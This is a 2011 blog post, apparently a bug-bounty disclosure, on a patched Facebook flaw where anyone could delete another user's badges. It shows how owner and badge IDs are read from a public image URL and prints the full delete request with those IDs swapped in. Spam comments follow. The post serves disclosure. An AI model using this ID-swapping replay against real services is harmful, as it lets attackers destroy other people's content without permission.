Pages

Friday, April 8, 2011

Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)

These days Facebook is one of the heaviest engine of advertising, many companies use Facebook to promote their products and even hire people to deal just with that.


I found an attack vector that can be used by any hacker to delete badges/ads from people's/companies's accounts which will cause a damage to every blog/other website
because a new bages will have a new "bid" so every website will drop the old badge.

This issue effects the Badges feature 
As for: 
Badges Home
Profile Badges
Like Badges
Photo Badges
Page Badges

Vulnerability Details:
A user uses the badges feature to share on blogger or any other place
an attacker see the bage in some website/blog:
<img src="http://badge.facebook.com/badge/1403380007.3098.1711802846.png" width="336" height="84" style="border: 0px;">
Analyzing the Picture's name:
The first number 1403380007 is the Victim's facebook owner ID
(it's easy to get this id using a simple search in facebook)
Now the middle number: 3098 is the bid(badge id) 

Now what the Attacker needs is to capture a deleting badge packet
and manipulate the "bid" and "owner_id"

POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/profile.php?status=new
Origin: http://www.facebook.com
X-SVN-Rev: 349667
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mycookie
Content-Length: 137

bid=3098&owner_id=1403380007&post_form_id=073ca00487f1c8fb8903a6ff04ed57be&fb_dtsg=4xsur&lsd&post_form_id_source=AsyncRequest&confirmed=1

Then a successful badge delete will be performed on the victim's account


The Facebook Team Fixed this issue and thanked me by adding my name into the Facebook WhiteHats thank you list : Facebook Security WhiteHats

Best Regards,
Ben Hayak 

5 comments:

  1. It is very quite great and informative blog. Thanks for sharing this blog. I want to tell a great way to access any blocked site. It is very needed link must try it just single click
    Facebook UK proxy

    ReplyDelete
  2. Wasp dudes! Amazing stuff continues the good work.
    http://homessecuritysystemsreviews.webs.com/

    ReplyDelete
  3. Thumbs up guys you are really carrying out a great job.
    frontpoint security reviews

    ReplyDelete